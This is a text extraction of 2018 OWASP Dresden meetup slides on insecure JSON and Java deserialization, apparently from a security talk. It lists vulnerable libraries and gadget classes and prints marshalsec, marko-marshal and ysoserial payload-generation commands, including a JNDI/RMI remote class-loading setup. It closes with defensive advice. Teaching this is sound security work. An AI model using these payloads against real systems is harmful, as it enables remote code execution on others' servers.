sign in sign up
<<
Home , Apache Flex, Serialization

Json Deserialization Exploitation RCE by Design

1 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 contentS

1. Introduction

2. Basics

3. Exploitation

4. Summary / Further Research

2 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Introduction

. DefCon 2017: “Friday the 13th: JSON Attacks” [1]

. Slides quite rightly point out: 2016 was the “year of Java Deserialization apocalypse”

. In the age of RESTful APIs and microservice architecture, the transmission of objects shifts to a JSON or XML serialized form

. Usage of JSON or XML more secure?

3 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Introduction

. Moritz Bechler published a paper about deserialization vulnerabilities (focused on Java JSON and XML) [5]

. .Net serialization libraries are affected as well [6]

. OWASP Top 10 2017 RC2 [7] ranked insecure deserialization to the eighth place

4 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Introduction

5 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics

Dummy. { “id": 1338, “object": "Test" }

default T parseJackson(Class clazz, String json) throws IOException {

ObjectMapper mapper = new ObjectMapper();

mapper.enableDefaultTyping(); mapper.configure(JsonParser.Feature.ALLOW_UNQUOTED_FIELD_NAMES, true);

T object = mapper.readValue(json, clazz);

return object; }

public class Dummy {

public int id; public Object object;

public int getId() { return id; }

6 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics

. JSON marshallers should be able to reconstruct the object using the details present in JSON

. unmarshaller creates a new object (allocates space in memory)

. using the default (parameterless) constructor . reflection to populate all fields or property members

. JSON libraries need to reconstruct objects by either:

. Calling default constructor and using reflection to set field values . Calling default constructor and calling setters to set field values . Calling “special” constructors, type converters or callbacks . Calling common methods such as: hashcode(), toString(), equals(), finalize(), …

7 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics

8 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics

9 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics

. JSON libraries invoked setters to populate object fields

. [5] and [6] focused their analysis on finding types with setters that could lead to arbitrary code execution (Java & .Net)

10 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics Library Language Technologie FastJSON .NET JSON Json.Net .NET JSON FSPickler .NET JSON Sweet.Jayson .NET JSON JavascriptSerializer .NET JSON DataContractJsonSerializer .NET JSON Jackson Java JSON Genson Java JSON JSON-IO Java JSON FlexSON Java JSON SnakeYAML (YAML) Java YAML jYAML (YAML) Java YAML YamlBeans (YAML) Java YAML BlazeDS (AMF4) Java AMF4 Red5 IO AMF (AMF) Java AMF Castor (XML) Java XML Java XMLDecoder (XML) Java XML Java Serialization (binary) Java binary Kryo (binary) Java binary Hessian/Burlap (binary/XML) Java binary/XML

11 I OWASP Stammtisch Dresden - JSONXStream Deserialization (XML/various)I 10.08.2018 Java XML/various Basics – GADGETs/Payload

. Bean property based marshallers gadgets

. call setter methods which means that far more code can be triggered directly during unmarshalling

12 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Basics – GADGETs/Payloads

com.sun.rowset.JdbcRowSetImpl java.util.ServiceLoader$LazyIterator com.sun.jndi.rmi.registry.BindingEnumeration

com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl

javax.imageio.ImageIO$ContainsFilter Commons Configuration JNDIConfiguration C3P0 JndiRefForwardingDataSource C3P0 WrapperConnectionPoolDataSource Spring Beans PropertyPathFactoryBean Spring AOP PartiallyComparableAdvisorHolder Spring AOP AbstractBeanFactoryPointcutAdvisor Spring DefaultListableBeanFactory Apache XBean Caucho Resin javax.script.ScriptEngineManager Commons Beanutils BeanComparator ROME EqualsBean/ToStringBean Groovy Expando/MethodClosure sun.rmi.server.UnicastRef(2) java.rmi.server.UnicastRemoteObject

13 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

. Moritz Bechler published a payload generator based on his previous work

. https://github.com/mbechler/marshalsec/

. Payload Generation via marshal

java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.Jackson -a -v java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.JsonIO -a -v

14 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

. Payload Generation via marko-marshal [8]

URI jndiUrl = new URI("rmi://localhost:1069/Exploit");

Configuration = Configuration .create() .all(true) .codebase("http://localhost:31337/") .codebaseClass("Exploit.class") .JNDIUrl(jndiUrl) .escapeType(EscapeType.NONE) .executable("C:\\Windows\\notepad.exe", "") .gadgetType(GadgetType.SpringPropertyPathFactory) .build();

MarshalsecFactory factory = new MarshalsecFactory(c);

List allPayloads = factory.allPayloads();

allPayloads.forEach(payload -> payload.getPayloads().values().forEach( System.out::println) );

15 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

JNDI Exploitation – Basics

. JNDI is the Java to interact with Naming and Directory Services

. offers a single common interface to interact with disparate Naming and Directory services such as

. Remote Method Invocation (RMI) . Lightweight Directory Access Protocol (LDAP), . Active Directory, . Domain Name System (DNS), . Common Architecture (CORBA), . etc.

16 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Exploitation

JNDI Exploitation – Basics [9]

. (JVM) allows loading of custom classes from a remote source without any restrictions

17 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

. RMI Exploitation [9] - Java remote method invocation

18 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

. RMI Exploitation [9] - Java remote method invocation

19 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

RMI Exploitation – Limitation

. Java 8u121 finally added that codebase restriction, but only for RMI at this point

20 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

DEMO TIME

[10] https://github.com/no-sec-marko/java-web-vulnerabilities

21 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Exploitation

. All serializers need to reconstruct objects and will normally invoke methods

. Problem is not limited to Java (e.g. BinaryFormatter in .Net)

ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19" > execute-ping.txt

Quelle: https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution

22 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018

Summary / FuRther Work

. JSON is not safe

. Security by design: identify the use of known vulnerable components

. https://www.cvedetails.com/cve/CVE-2017-9805/

. Other libraries? (Vert.x)

. Burp Plugin (Burp Collaborator)

23 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Summary / FuRther Work ??

. One year later…

. [11]: Published date: 07 June 2018 . https://github.com/nccgroup/freddy

24 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Summary / FuRther Work

. JSON is not safe

. Other libraries? (Vert.x)

. Pentest view? BOSCH & AXA

. Burp Plugin (Burp Colllaborator)

25 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 Summary / FuRther Work

. Notable exceptions without this kind of behavior:

. JAXB implementations generally require that all types used are registered. Mechanisms that require schema definitions or compilation (e.g. XmlBeans, Jibx, Protobuf). . GSON requires specifying a root type, honors property types and the mechanism for polymorphism requires registration. . GWT-RPC generally does use supplied type information, but automatically builds a whitelist.

26 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 FIN

27 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018 References

. [1] https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Alvaro- Munoz-JSON-attacks.

. [2] https://www.rsaconference.com/writable/presentations/file_upload/asd-f03-serial-killer-silently-pwning-your- java-endpoints.pdf

. [3] https://github.com/frohoff/ysoserial

. [4] http://frohoff.github.io/appseccali-marshalling-pickles/

. [5] https://github.com/mbechler/marshalsec/blob/master/marshalsec.pdf

. [6] https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf

. [7] https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%202017%20RC2%20Final.pdf

. [8] https://github.com/no-sec-marko/marshalsec

. [9] https://www.iswin.org/2016/01/24/Spring-framework-deserialization-RCE- %E5%88%86%E6%9E%90%E4%BB%A5%E5%8F%8A%E5%88%A9%E7%94%A8/

. [10] https://github.com/no-sec-marko/java-web-vulnerabilities

. [11] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/june/finding-deserialisation- issues-has-never-been-easier-freddy-the-serialisation-killer/

28 I OWASP Stammtisch Dresden - JSON Deserialization I 10.08.2018